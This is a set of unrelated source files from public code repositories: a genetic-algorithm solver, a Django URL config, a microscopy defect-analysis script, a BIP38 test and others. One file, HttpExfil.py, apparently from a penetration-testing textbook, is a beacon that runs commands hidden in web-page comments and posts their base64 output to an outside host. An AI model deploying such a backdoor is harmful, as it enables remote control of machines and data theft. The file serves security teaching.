b5ebdfe3b10eec2fa3575652a3e0276ef6f4b913 | 332e04cf48647c120161f3765fe3285a38fc44db | /qap_lab/source/solver.py | 4737c3303eae5ae21be6d978a9335d1cd4ed70c3 | [] | no_license | Venopacman/comb_opt_lessons | 7783d2eab3d037c566f84442fb1b8d4af00ad864 | 687aa6d5eab6424f1e310e0ac1230ca11670cc82 | refs/heads/master | 2020-03-29T12:41:39.226108 | 2018-11-25T21:17:15 | 2018-11-25T21:17:15 | 149,912,955 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 7,695 | py | import itertools
import os
import random
from copy import deepcopy
from typing import List
import numpy as np
import tqdm
from qap_lab.source.data_utils import Problem
from tqdm import trange
import json
import os
from multiprocessing import Pool
class Chromosome:
"""
Permutation vector wrapper
"""
def __init__(self, gene_list: List[int], _problem: Problem):
self.genome = gene_list
self.flow_matrix = _problem.flow_matrix
self.dist_matrix = _problem.distance_matrix
self.fitness = self.calc_fitness()
# print(self.fitness)
def calc_fitness(self) -> float:
n = len(self.genome)
return sum([self.dist_matrix[i][j] * self.flow_matrix[self.genome[i]][self.genome[j]]
for i in range(n)
for j in range(n)])
def swap_mutation(self):
pass
def scrumble_mutation(self):
pass
def persist(self, dir, problem_name):
with open(os.path.join(dir, problem_name), 'w') as f:
f.write(" ".join([str(it + 1) for it in self.genome]))
class Population:
def __init__(self, _chromosome_list: List[Chromosome], _problem: Problem):
self.chromosome_list = _chromosome_list
self.problem = _problem
self.rolling_wheel_prob = self.calc_rolling_wheel_prob()
def breeding(self) -> None:
"""
Population evolving process
"""
pass
def get_best_chromosome(self) -> Chromosome:
return min(self.chromosome_list, key=lambda x: x.fitness)
def calc_rolling_wheel_prob(self):
"""
Calculate inverted related fitness for minimization task
:return:
"""
_sum = sum([1 / chrom.fitness for chrom in self.chromosome_list])
probs = [(1 / chrom.fitness) / _sum for chrom in self.chromosome_list]
return probs
def select_n_chromosomes(self, n: int) -> List[Chromosome]:
selected_index = np.random.choice(len(self.chromosome_list), n, p=self.rolling_wheel_prob)
return [self.chromosome_list[i] for i in selected_index]
class GeneticAlgorithmSolver:
def __init__(self, _problem: Problem):
self.problem = _problem
self.population_size = 100
self.selection_size = int(self.population_size * 0.3)
self.population = self.generate_initial_population()
def generate_initial_population(self) -> Population:
_chromo_list = set()
genome = list(range(self.problem.problem_size))
while len(_chromo_list) != self.population_size:
# for _ in range(self.population_size):
_chromo_list.add(Chromosome(deepcopy(genome), self.problem))
random.shuffle(genome)
return Population(list(_chromo_list), self.problem)
def selection(self, population: Population) -> List[Chromosome]:
"""
Rolling wheel selection
:param population:
:return:
"""
return population.select_n_chromosomes(self.selection_size)
def ordered_crossover(self, chrom_1: Chromosome, chrom_2: Chromosome) -> Chromosome:
_ub = len(chrom_1.genome) - 1
start_index = np.random.randint(0, _ub)
end_index = start_index + np.random.randint(1, _ub - start_index + 1)
alpha_genome = chrom_1.genome[start_index:end_index]
beta_genome = [gen for gen in chrom_2.genome if gen not in alpha_genome]
resulted_genome = beta_genome[:start_index] + alpha_genome + beta_genome[start_index:]
return Chromosome(resulted_genome, self.problem)
def reproduction(self, parents: List[Chromosome], n: int) -> List[Chromosome]:
pairs_universe: List[(Chromosome, Chromosome)] = [(ch_1, ch_2) for ch_1 in parents for ch_2 in parents
if ch_1 != ch_2]
# pair_sample = [pairs_universe[i] for i in
# ]
child_list = set()
# for parent_1, parent_2 in pair_sample:
while len(child_list) != n:
parent_1, parent_2 = pairs_universe[
np.random.choice(len(pairs_universe), n, p=[1 / len(pairs_universe)] * len(pairs_universe))[0]]
child_list.add(self.ordered_crossover(parent_1, parent_2))
return list(child_list)
def solve(self) -> Chromosome:
current_best: Chromosome = self.population.get_best_chromosome()
# t = trange(100, desc='Solving')
for _ in range(25000):
# avg_fitness = np.average([it.fitness for it in self.population.chromosome_list])
# t.set_description('Solving (avg fitness=%g)' % avg_fitness)
parents = self.selection(self.population)
childes = self.reproduction(parents, self.population_size - self.selection_size)
self.population = self.mutation(childes, parents)
cand_best: Chromosome = self.population.get_best_chromosome()
if cand_best.fitness < current_best.fitness:
current_best = cand_best
# print('Best update: {0}'.format(current_best.fitness))
return current_best
def mutation(self, _childes: List[Chromosome], _parents: List[Chromosome]):
def _mutate(_chromosome: Chromosome) -> Chromosome:
def _swap(_chromosome, a_ind, b_ind) -> Chromosome:
_genome = _chromosome.genome
_genome[a_ind], _genome[b_ind] = _genome[b_ind], _genome[a_ind]
return Chromosome(_genome, self.problem)
def _scramble(_chromosome, a_ind, b_ind) -> Chromosome:
_genome = _chromosome.genome
_buff = deepcopy(_genome[a_ind:b_ind])
random.shuffle(_buff)
_genome[a_ind:b_ind] = _buff
return Chromosome(_genome, self.problem)
_ub = len(_chromosome.genome) - 1
start_index = np.random.randint(0, _ub)
end_index = start_index + np.random.randint(1, _ub - start_index + 1)
if random.uniform(0, 1) > 0.5:
return _swap(_chromosome, start_index, end_index)
else:
return _scramble(_chromosome, start_index, end_index)
unmutated_population = _childes + _parents
threshold = random.uniform(1 / self.population_size, 1 / self.problem.problem_size)
resulted_population = []
for chromosome in unmutated_population:
if random.uniform(0, 1) > threshold:
resulted_population.append(chromosome)
else:
resulted_population.append(_mutate(chromosome))
return Population(resulted_population, self.problem)
def main(path):
problem_name = path.split("/")[-1].split(".")[0]
tai_problem = Problem(path)
genetic_solver = GeneticAlgorithmSolver(tai_problem)
solution = genetic_solver.solve()
result_dict = json.load(open("../data/best_results.json"))
if result_dict[problem_name] > solution.fitness or result_dict[problem_name] == 0:
solution.persist(os.path.dirname(path), problem_name + ".sol")
print("Improvement in {0} problem!".format(problem_name))
result_dict[problem_name] = int(solution.fitness)
print("Problem {0} finished!".format(problem_name))
json.dump(result_dict, open("../data/best_results.json", 'w'), indent=2)
if __name__ == "__main__":
root_dir = '../data'
problem_path_list = [os.path.join(root_dir, it) for it in os.listdir(root_dir) if
not (it.endswith(".json") or it.endswith(".sol"))] * 10
with Pool(processes=4) as pool:
for res in pool.imap_unordered(main, problem_path_list):
pass
| [
"pdsmirnov@yandex.ru"
] | pdsmirnov@yandex.ru |
550abb7570d8b8943d140a815dfcc92c727bbc0b | fbb1494be3ff7b6a5dfa3b9204cc927af4103b59 | /api/urls.py | 242b792a393d67ac9d39ff798fc079072c76b9ff | [] | no_license | james-work-account/raml_loader_api | a3380faf6f07ae82b1b113e7019fbb5f6840df31 | 4483b13de5d74c20f7c3696ba6180332b36fdc2b | refs/heads/master | 2021-07-24T07:32:28.507993 | 2020-10-06T08:38:23 | 2020-10-06T08:38:23 | 222,752,033 | 0 | 0 | null | 2020-10-06T08:25:55 | 2019-11-19T17:29:11 | Python | UTF-8 | Python | false | false | 802 | py | """api URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
urlpatterns = [
path('raml/', include('raml_parser.urls')),
path('admin/', admin.site.urls),
]
| [
"31282758+james-work-account@users.noreply.github.com"
] | 31282758+james-work-account@users.noreply.github.com |
34d788e9ab997f619139b8af4b45a786cee0aac0 | ce27a376fa4f6a25008674d007c670a4a0b8bda7 | /defects_thresholding.py | 1c96261ba4ebe8222fcc90b839c16ced1c0d9cfa | [] | no_license | jrr1984/defects_analysis | 22139b7734478b6261cf9efeaae755a2c5c71c79 | 2e43b65f1b936516f4a4c8f7feb5d46468864957 | refs/heads/master | 2020-12-10T20:00:39.977833 | 2020-04-16T12:00:22 | 2020-04-16T12:00:22 | 233,694,615 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,701 | py | from skimage.filters import threshold_yen,threshold_isodata
from skimage import io,measure,img_as_float,morphology
from skimage.measure import regionprops_table
from skimage.color import label2rgb
import numpy as np
from scipy import ndimage
import matplotlib.pyplot as plt
from matplotlib_scalebar.scalebar import ScaleBar
import pandas as pd
import glob
import time
start_time = time.time()
pixels_to_microns = 0.586
proplist = ['equivalent_diameter','area']
path = "C:/Users/juanr/Documents/mediciones_ZEISS/TILING/NIR/norm/*.tif"
data= []
holes_data = []
i=0
for file in glob.glob(path):
img = io.imread(file)
img = img_as_float(img)
thresh = threshold_yen(img)
binary = img <= thresh
binary_var = img <= (thresh - 0.1*thresh)
masked_binary = ndimage.binary_fill_holes(binary)
masked_binary_var = ndimage.binary_fill_holes(binary_var)
hols = masked_binary.astype(int) - binary
hols_var = masked_binary_var.astype(int) - binary_var
lab = measure.label(hols,connectivity=2)
lab_var = measure.label(hols_var, connectivity=2)
cleaned_holes = morphology.remove_small_objects(lab, connectivity=2)
cleaned_holes_var = morphology.remove_small_objects(lab_var, connectivity=2)
label_image = measure.label(masked_binary,connectivity=2)
label_image_var = measure.label(masked_binary_var, connectivity=2)
label_final = morphology.remove_small_objects(label_image, min_size=15)
label_final_var = morphology.remove_small_objects(label_image_var, min_size=15)
if label_final.any()!=0 and label_final_var.any() !=0:
props = regionprops_table(label_final, intensity_image=img, properties=proplist)
props_var = regionprops_table(label_final_var, intensity_image=img, properties=proplist)
props_df = pd.DataFrame(props)
props_df_var = pd.DataFrame(props_var)
props_df['error_diameter'] = abs(round((props_df['equivalent_diameter'] - props_df_var['equivalent_diameter'])*pixels_to_microns))
props_df['error_area'] = abs(round((props_df['area'] - props_df_var['area']) * pixels_to_microns ** 2))
props_df['img'] = i
data.append(props_df)
print('defects_df')
print(props_df)
print('error')
print(props_df['error_diameter'])
if cleaned_holes.any()!= 0 and cleaned_holes_var.any() != 0:
props_holes = regionprops_table(cleaned_holes, intensity_image=img, properties=proplist)
props_holes_var = regionprops_table(cleaned_holes_var, intensity_image=img, properties=proplist)
holes_df = pd.DataFrame(props_holes)
holes_df_var = pd.DataFrame(props_holes_var)
holes_df['error_diameter'] = abs(round((holes_df['equivalent_diameter'] - holes_df_var['equivalent_diameter'])*pixels_to_microns))
holes_df['error_area'] = abs(round((holes_df['area'] - holes_df_var['area']) * pixels_to_microns**2))
holes_df['img'] = i
holes_data.append(holes_df)
print('holes_df')
print(holes_df)
print('error holes')
print(holes_df['error_diameter'])
print(file, i)
i += 1
df = pd.concat(data)
df['equivalent_diameter'] = round(df['equivalent_diameter'] * pixels_to_microns)
df['area'] = round(df['area'] * pixels_to_microns **2)
df.to_pickle("C:/Users/juanr/Documents/data_mediciones/defects/defectsNIR_df.pkl")
holes_df = pd.concat(holes_data)
holes_df['equivalent_diameter'] = round(holes_df['equivalent_diameter'] * pixels_to_microns)
holes_df['area'] = round(holes_df['area'] * pixels_to_microns **2)
holes_df.to_pickle("C:/Users/juanr/Documents/data_mediciones/defects/defectsholesNIR_df.pkl")
print("--- %s minutes ---" % ((time.time() - start_time)/60)) | [
"juanreto@gmail.com"
] | juanreto@gmail.com |
420fab0c05381289bc6cac20833db699a61ff63b | b883802b374515f7bb453f9631a65bb63b5cd8cc | /filter.py | 6e03457e43b34ee541ab28f736a0550bd1d99d3e | [] | no_license | Harry-Yao/learn-about-python | 6898cae04f665400ab255989b9d8c1388cb94362 | 558085e0fdd7a4488303c91206b44b353e4b58e7 | refs/heads/master | 2021-01-10T17:44:29.301594 | 2016-03-10T16:09:50 | 2016-03-10T16:09:50 | 52,965,207 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 176 | py | # -*- coding: utf-8 -*-
def is_palindrome(n):
if str(n) == str(n)[::-1]:
return str(n)
# 测试:
output = filter(is_palindrome, range(1, 1000))
print(list(output)) | [
"673441990@qq.com"
] | 673441990@qq.com |
a722c34d1eb09a9e71cc919a6734cf38c3fe7d9a | bcc1f398423b7107dc54b3046fa49029b416fba2 | /Module 3/Chapter 8/HttpExfil.py | 9b8d7d24874df32cc0cf0c653201baaea33956cf | [
"MIT",
"Apache-2.0"
] | permissive | PacktPublishing/Python-Penetration-Testing-for-Developers | d81432bd276366fb606e0d2231956c2770b2952c | a712d19c9587d04e13b332adbc3620c0df477c89 | refs/heads/master | 2023-02-18T20:10:37.725636 | 2023-01-30T08:36:57 | 2023-01-30T08:36:57 | 68,084,109 | 43 | 37 | null | null | null | null | WINDOWS-1250 | Python | false | false | 521 | py | import requests
import re
import subprocess
import time
import os
while 1:
req = requests.get("http://127.0.0.1")
comments = re.findall('<!--(.*)-->',req.text)
for comment in comments:
if comment = " ":
os.delete(__file__)
else:
try:
response = subprocess.check_output(comment.split())
except:
response = “command fail”
data={"comment":(''.join(response)).encode("base64")}
newreq = requests.post("http://127.0.0.1notmalicious.com/xss/easy/addguestbookc2.php ", data=data)
time.sleep(30)
| [
"jayeshs@packtpub.net"
] | jayeshs@packtpub.net |
ad3c6e6becb9b5646766ed2063c8d949313bda56 | aee573c81dc297a97772b99cd90e05d494b25f77 | /learnpython/matplotlib/demo_plot_2.py | e5879a3c9928961f2b12810475ab9a793f96f56e | [] | no_license | YuxuanSu-Sean/learning | 6df9d7b348e3f6c8cad0347e222c1ed244c92332 | 1356b85c2b673925f1fc89ff45f54fb499d342d0 | refs/heads/master | 2022-11-13T14:08:17.808037 | 2022-11-10T05:15:16 | 2022-11-10T05:15:16 | 204,625,964 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 82 | py | import matplotlib.pyplot as plt
fig = plt.figure()
ax1 = fig.add_subplot(111)
| [
"497572121@qq.com"
] | 497572121@qq.com |
a2db15dc70256c5ac16e2d712ccd8393faf996ac | c820e028be4239bc20e76af41574e561ba8d8e02 | /gsw/version.py | 2f5fd65dfc4d9ab9ae7c7b3df560f34efabacd78 | [
"MIT"
] | permissive | lukecampbell/python-gsw | 7657c2e3a0dbadad00ff17557f4ca45f971f3964 | c555921b5f1fcbc1c1a3565172b946f782d15db4 | refs/heads/master | 2016-09-06T16:54:47.074484 | 2013-02-20T20:00:03 | 2013-02-20T20:00:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 43 | py | #!/usr/bin/env python
version = '3.0.1a1'
| [
"luke.s.campbell@gmail.com"
] | luke.s.campbell@gmail.com |
b301691a347e993eeb0904ec4da555a684042612 | caf39133030e9e9d9240769fbfe72287009c6b51 | /math/0x02-calculus/17-integrate.py | 70e1a9c8db0993bc659e0d727a1f9eab6e7a5be6 | [] | no_license | sazad44/holbertonschool-machine_learning | d08facbc24582ebcedf9a8607c82b18909fe7867 | b92e89b980a8f1360a24f4ed5654a2ab0dfac679 | refs/heads/master | 2022-11-30T22:32:21.264942 | 2020-08-12T05:25:06 | 2020-08-12T05:25:06 | 280,286,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 728 | py | #!/usr/bin/env python3
"""task 17 py function to integrate a polynomial"""
def poly_integral(poly, C=0):
"""py function to calculate integral of poly"""
if not isinstance(
poly,
list
) or len(
poly
) == 0 or not isinstance(
C,
int
):
return None
newPoly = [C]
for c in range(len(poly)):
appVal = poly[c] / (c + 1)
if appVal.is_integer():
newPoly.append(int(appVal))
else:
newPoly.append(appVal)
if sum(newPoly) == 0:
return [0]
cutoff = 1
while newPoly[-cutoff] == 0:
cutoff += 1
if newPoly[-1] == 0:
newPoly = newPoly[:-(cutoff - 1)]
return newPoly
| [
"36613205+sazad44@users.noreply.github.com"
] | 36613205+sazad44@users.noreply.github.com |
998e74d73408d3c5bf3bf99ce5df17a7a52ee3f8 | 0a40a0d63c8fce17f4a686e69073a4b18657b160 | /test/functional/rpc_bip38.py | b70349a25ed83fb3fc00d631b1bc8dcd9eb3f3e4 | [
"MIT"
] | permissive | MotoAcidic/Cerebellum | 23f1b8bd4f2170c1ed930eafb3f2dfff07df1c24 | 6aec42007c5b59069048b27db5a8ea1a31ae4085 | refs/heads/main | 2023-05-13T06:31:23.481786 | 2021-06-09T15:28:28 | 2021-06-09T15:28:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,025 | py | #!/usr/bin/env python3
# Copyright (c) 2018-2019 The CEREBELLUM developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test RPC commands for BIP38 encrypting and decrypting addresses."""
from test_framework.test_framework import CerebellumTestFramework
from test_framework.util import assert_equal
class Bip38Test(CerebellumTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
def run_test(self):
password = 'test'
address = self.nodes[0].getnewaddress()
privkey = self.nodes[0].dumpprivkey(address)
self.log.info('encrypt address %s' % (address))
bip38key = self.nodes[0].bip38encrypt(address, password)['Encrypted Key']
self.log.info('decrypt bip38 key %s' % (bip38key))
assert_equal(self.nodes[1].bip38decrypt(bip38key, password)['Address'], address)
if __name__ == '__main__':
Bip38Test().main()
| [
"travisfinch01@gmail.com"
] | travisfinch01@gmail.com |
2bcd1788de6e9a593abedae6ed61b48c43c67654 | 06d6c9346331e392f6d8067eb9ee52d38ae5fab8 | /carver/pe/setup.py | 299b8bff264703b5031d4a1ddd6b11e7c4e69e92 | [
"Apache-2.0"
] | permissive | maydewd/stoq-plugins-public | 5d5e824dda0c78acab4ff9aef72f567e6b85e555 | 8b2877b5091ae731437ef35a95d4debdbf0a19f3 | refs/heads/master | 2020-03-22T18:57:41.061748 | 2018-06-12T14:36:42 | 2018-06-12T14:36:42 | 140,494,475 | 0 | 0 | Apache-2.0 | 2018-07-10T22:39:08 | 2018-07-10T22:39:08 | null | UTF-8 | Python | false | false | 371 | py | from setuptools import setup, find_packages
setup(
name="pe",
version="0.10",
author="Jeff Ito, Marcus LaFerrera (@mlaferrera)",
url="https://github.com/PUNCH-Cyber/stoq-plugins-public",
license="Apache License 2.0",
description="Carve portable executable files from a data stream",
packages=find_packages(),
include_package_data=True,
)
| [
"marcus@randomhack.org"
] | marcus@randomhack.org |
f6feb1566f4a0b2b2e1860b1005500bb45004b68 | 79429bd1c124044572bef9d1062d145c01e20b24 | /ex026.py | d7d2e948a9f0c2b06d59b7d78ecec3325b3eb7ee | [] | no_license | xxweell/exerciciosPython | b6fe00d67a39391bb8794953832f07f7f75eb504 | 93c1ac25dc1d1875c4102e1126fa54a537bb0973 | refs/heads/master | 2022-11-14T20:30:13.587004 | 2020-06-17T21:06:59 | 2020-06-17T21:06:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 353 | py | frase = str(input('Digite uma frase: ')).strip().upper()
print('A letra A aparece {} vezes na frase.'.format(frase.count('A')))
print('A primeira letra A apareceu na posição {}.'.format(frase.find('A')+1)) # find retorna a posição em que foi encontrado a primeira vez
print('A última letra A apareceu na posição {}.'.format(frase.rfind('A')+1))
| [
"wellingtoncw7@gmail.com"
] | wellingtoncw7@gmail.com |
dc23bbd95004a5f6fa4e5a6ef31d8b013040ba34 | 6874015cb6043d1803b61f8978627ddce64963b4 | /django/db/backends/postgresql/operations.py | 0edcf42febaa364b316750501cb20183caacea8e | [
"BSD-3-Clause",
"Python-2.0"
] | permissive | yephper/django | 25fbfb4147211d08ec87c41e08a695ac016454c6 | cdd1689fb354886362487107156978ae84e71453 | refs/heads/master | 2021-01-21T12:59:14.443153 | 2016-04-27T09:51:41 | 2016-04-27T09:51:41 | 56,134,291 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 11,101 | py | from __future__ import unicode_literals
from psycopg2.extras import Inet
from django.conf import settings
from django.db.backends.base.operations import BaseDatabaseOperations
class DatabaseOperations(BaseDatabaseOperations):
def unification_cast_sql(self, output_field):
internal_type = output_field.get_internal_type()
if internal_type in ("GenericIPAddressField", "IPAddressField", "TimeField", "UUIDField"):
# PostgreSQL will resolve a union as type 'text' if input types are
# 'unknown'.
# http://www.postgresql.org/docs/9.4/static/typeconv-union-case.html
# These fields cannot be implicitly cast back in the default
# PostgreSQL configuration so we need to explicitly cast them.
# We must also remove components of the type within brackets:
# varchar(255) -> varchar.
return 'CAST(%%s AS %s)' % output_field.db_type(self.connection).split('(')[0]
return '%s'
def date_extract_sql(self, lookup_type, field_name):
# http://www.postgresql.org/docs/current/static/functions-datetime.html#FUNCTIONS-DATETIME-EXTRACT
if lookup_type == 'week_day':
# For consistency across backends, we return Sunday=1, Saturday=7.
return "EXTRACT('dow' FROM %s) + 1" % field_name
else:
return "EXTRACT('%s' FROM %s)" % (lookup_type, field_name)
def date_trunc_sql(self, lookup_type, field_name):
# http://www.postgresql.org/docs/current/static/functions-datetime.html#FUNCTIONS-DATETIME-TRUNC
return "DATE_TRUNC('%s', %s)" % (lookup_type, field_name)
def _convert_field_to_tz(self, field_name, tzname):
if settings.USE_TZ:
field_name = "%s AT TIME ZONE %%s" % field_name
params = [tzname]
else:
params = []
return field_name, params
def datetime_cast_date_sql(self, field_name, tzname):
field_name, params = self._convert_field_to_tz(field_name, tzname)
sql = '(%s)::date' % field_name
return sql, params
def datetime_extract_sql(self, lookup_type, field_name, tzname):
field_name, params = self._convert_field_to_tz(field_name, tzname)
sql = self.date_extract_sql(lookup_type, field_name)
return sql, params
def datetime_trunc_sql(self, lookup_type, field_name, tzname):
field_name, params = self._convert_field_to_tz(field_name, tzname)
# http://www.postgresql.org/docs/current/static/functions-datetime.html#FUNCTIONS-DATETIME-TRUNC
sql = "DATE_TRUNC('%s', %s)" % (lookup_type, field_name)
return sql, params
def deferrable_sql(self):
return " DEFERRABLE INITIALLY DEFERRED"
def fetch_returned_insert_ids(self, cursor):
"""
Given a cursor object that has just performed an INSERT...RETURNING
statement into a table that has an auto-incrementing ID, return the
list of newly created IDs.
"""
return [item[0] for item in cursor.fetchall()]
def lookup_cast(self, lookup_type, internal_type=None):
lookup = '%s'
# Cast text lookups to text to allow things like filter(x__contains=4)
if lookup_type in ('iexact', 'contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith', 'regex', 'iregex'):
if internal_type in ('IPAddressField', 'GenericIPAddressField'):
lookup = "HOST(%s)"
else:
lookup = "%s::text"
# Use UPPER(x) for case-insensitive lookups; it's faster.
if lookup_type in ('iexact', 'icontains', 'istartswith', 'iendswith'):
lookup = 'UPPER(%s)' % lookup
return lookup
def last_insert_id(self, cursor, table_name, pk_name):
# Use pg_get_serial_sequence to get the underlying sequence name
# from the table name and column name (available since PostgreSQL 8)
cursor.execute("SELECT CURRVAL(pg_get_serial_sequence('%s','%s'))" % (
self.quote_name(table_name), pk_name))
return cursor.fetchone()[0]
def no_limit_value(self):
return None
def prepare_sql_script(self, sql):
return [sql]
def quote_name(self, name):
if name.startswith('"') and name.endswith('"'):
return name # Quoting once is enough.
return '"%s"' % name
def set_time_zone_sql(self):
return "SET TIME ZONE %s"
def sql_flush(self, style, tables, sequences, allow_cascade=False):
if tables:
# Perform a single SQL 'TRUNCATE x, y, z...;' statement. It allows
# us to truncate tables referenced by a foreign key in any other
# table.
tables_sql = ', '.join(
style.SQL_FIELD(self.quote_name(table)) for table in tables)
if allow_cascade:
sql = ['%s %s %s;' % (
style.SQL_KEYWORD('TRUNCATE'),
tables_sql,
style.SQL_KEYWORD('CASCADE'),
)]
else:
sql = ['%s %s;' % (
style.SQL_KEYWORD('TRUNCATE'),
tables_sql,
)]
sql.extend(self.sequence_reset_by_name_sql(style, sequences))
return sql
else:
return []
def sequence_reset_by_name_sql(self, style, sequences):
# 'ALTER SEQUENCE sequence_name RESTART WITH 1;'... style SQL statements
# to reset sequence indices
sql = []
for sequence_info in sequences:
table_name = sequence_info['table']
column_name = sequence_info['column']
if not (column_name and len(column_name) > 0):
# This will be the case if it's an m2m using an autogenerated
# intermediate table (see BaseDatabaseIntrospection.sequence_list)
column_name = 'id'
sql.append("%s setval(pg_get_serial_sequence('%s','%s'), 1, false);" %
(style.SQL_KEYWORD('SELECT'),
style.SQL_TABLE(self.quote_name(table_name)),
style.SQL_FIELD(column_name))
)
return sql
def tablespace_sql(self, tablespace, inline=False):
if inline:
return "USING INDEX TABLESPACE %s" % self.quote_name(tablespace)
else:
return "TABLESPACE %s" % self.quote_name(tablespace)
def sequence_reset_sql(self, style, model_list):
from django.db import models
output = []
qn = self.quote_name
for model in model_list:
# Use `coalesce` to set the sequence for each model to the max pk value if there are records,
# or 1 if there are none. Set the `is_called` property (the third argument to `setval`) to true
# if there are records (as the max pk value is already in use), otherwise set it to false.
# Use pg_get_serial_sequence to get the underlying sequence name from the table name
# and column name (available since PostgreSQL 8)
for f in model._meta.local_fields:
if isinstance(f, models.AutoField):
output.append(
"%s setval(pg_get_serial_sequence('%s','%s'), "
"coalesce(max(%s), 1), max(%s) %s null) %s %s;" % (
style.SQL_KEYWORD('SELECT'),
style.SQL_TABLE(qn(model._meta.db_table)),
style.SQL_FIELD(f.column),
style.SQL_FIELD(qn(f.column)),
style.SQL_FIELD(qn(f.column)),
style.SQL_KEYWORD('IS NOT'),
style.SQL_KEYWORD('FROM'),
style.SQL_TABLE(qn(model._meta.db_table)),
)
)
break # Only one AutoField is allowed per model, so don't bother continuing.
for f in model._meta.many_to_many:
if not f.remote_field.through:
output.append(
"%s setval(pg_get_serial_sequence('%s','%s'), "
"coalesce(max(%s), 1), max(%s) %s null) %s %s;" % (
style.SQL_KEYWORD('SELECT'),
style.SQL_TABLE(qn(f.m2m_db_table())),
style.SQL_FIELD('id'),
style.SQL_FIELD(qn('id')),
style.SQL_FIELD(qn('id')),
style.SQL_KEYWORD('IS NOT'),
style.SQL_KEYWORD('FROM'),
style.SQL_TABLE(qn(f.m2m_db_table()))
)
)
return output
def prep_for_iexact_query(self, x):
return x
def max_name_length(self):
"""
Returns the maximum length of an identifier.
Note that the maximum length of an identifier is 63 by default, but can
be changed by recompiling PostgreSQL after editing the NAMEDATALEN
macro in src/include/pg_config_manual.h .
This implementation simply returns 63, but can easily be overridden by a
custom database backend that inherits most of its behavior from this one.
"""
return 63
def distinct_sql(self, fields):
if fields:
return 'DISTINCT ON (%s)' % ', '.join(fields)
else:
return 'DISTINCT'
def last_executed_query(self, cursor, sql, params):
# http://initd.org/psycopg/docs/cursor.html#cursor.query
# The query attribute is a Psycopg extension to the DB API 2.0.
if cursor.query is not None:
return cursor.query.decode('utf-8')
return None
def return_insert_id(self):
return "RETURNING %s", ()
def bulk_insert_sql(self, fields, placeholder_rows):
placeholder_rows_sql = (", ".join(row) for row in placeholder_rows)
values_sql = ", ".join("(%s)" % sql for sql in placeholder_rows_sql)
return "VALUES " + values_sql
def adapt_datefield_value(self, value):
return value
def adapt_datetimefield_value(self, value):
return value
def adapt_timefield_value(self, value):
return value
def adapt_ipaddressfield_value(self, value):
if value:
return Inet(value)
return None
def subtract_temporals(self, internal_type, lhs, rhs):
if internal_type == 'DateField':
lhs_sql, lhs_params = lhs
rhs_sql, rhs_params = rhs
return "age(%s, %s)" % (lhs_sql, rhs_sql), lhs_params + rhs_params
return super(DatabaseOperations, self).subtract_temporals(internal_type, lhs, rhs)
| [
"smileszzh@163.com"
] | smileszzh@163.com |
ab523c3751accac0cb2820f8f76621d3ca5474ab | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_172/ch88_2020_05_06_12_07_01_120079.py | 65c8bdbe203ac21abf9a6631e62483803e27d184 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | class Retangulo:
def _init_(self,coord1, coord2):
coord1 = Ponto(x1, y1)
coord2 = Ponto(x2, y2)
def calcula_perimetro(self):
base = x2 - x1
altura = y2 - y1
p = 2*base + 2*altura
def calcula_area(self):
base = x2 - x1
altura = y2 - y1
a = base*altura | [
"you@example.com"
] | you@example.com |
bdd9f479c4b2fdd3901be2b45127d857c7560c00 | 60b1c5ab904a773e81d3f817279f9f2f72e15ac6 | /individual.py | be8c4cc2e02443bef755cf708e9a8b67834da694 | [
"MIT"
] | permissive | n0lley/polycube | 1dede161444c9f50220e8683742d95468290bdee | bc97b81b7455a8682fcd83f198fad437bb3dc4cb | refs/heads/master | 2021-08-07T01:09:05.584330 | 2020-07-28T23:18:28 | 2020-07-28T23:18:28 | 180,885,490 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 242 | py | class INDIVIDUAL:
def __init__(self, *args, **kwargs):
raise NotImplementedError
def mutate(self, *args, **kwargs):
raise NotImplementedError
def evaluate(self, *args, **kwargs):
raise NotImplementedError | [
"david.matthews.1@uvm.edu"
] | david.matthews.1@uvm.edu |
b779dffe55d8fb13948ccc43312f57df7c9b48af | 987d44772eb85c61deefe2986598903c9e965008 | /_site/site/performance_dashboard/data/GA/GA_scraper.py | 46864696a95d0a3d5b6fe1092f9e2c4dbe8719fb | [] | no_license | casten4congress/casten4congress.github.io | 40e92ac86088c941f9180839e6e1b1b8cf3fb837 | 456caaf8503ed63a7903ccf9dc19d23c914a1ca1 | refs/heads/master | 2020-03-12T17:32:29.826443 | 2018-07-17T20:39:41 | 2018-07-17T20:39:41 | 130,738,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,429 | py | import json
from apiclient.discovery import build
from oauth2client.service_account import ServiceAccountCredentials
